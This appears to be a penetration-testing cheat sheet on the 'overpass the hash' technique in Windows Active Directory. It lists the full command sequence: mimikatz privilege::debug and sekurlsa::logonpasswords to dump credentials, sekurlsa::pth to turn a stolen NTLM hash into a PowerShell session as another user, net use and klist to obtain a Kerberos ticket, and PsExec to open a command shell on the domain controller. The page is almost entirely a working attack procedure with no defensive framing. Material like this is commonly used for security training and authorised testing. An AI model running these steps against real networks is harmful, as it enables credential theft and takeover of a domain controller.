OverPass the hash
Overpass the hash
With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.
Transfer all 3 mimikatz file to run mimikatz.exe mimikatz.exe
Give privilege access privilege::debug
sekurlsa::logonpasswords Skip this step, if you already have hash
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe At this point, we have a new PowerShell session that allows us to execute commands as <user>.
exit mimikatz
klist No Kerberos tickets have been cached, but this is expected since <user> has not performed an interactive login.
net use \\<dc_machine_name> However, let’s generate a TGT by authenticating to a network share on the domain controller or another service with net use:
klist
We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application from Microsoft
.\PsExec.exe \\<dc_machine_name> cmd.exe
ipconfig to check
successfully reused the Kerberos TGT to launch a command shell on the domain controller.
Last updated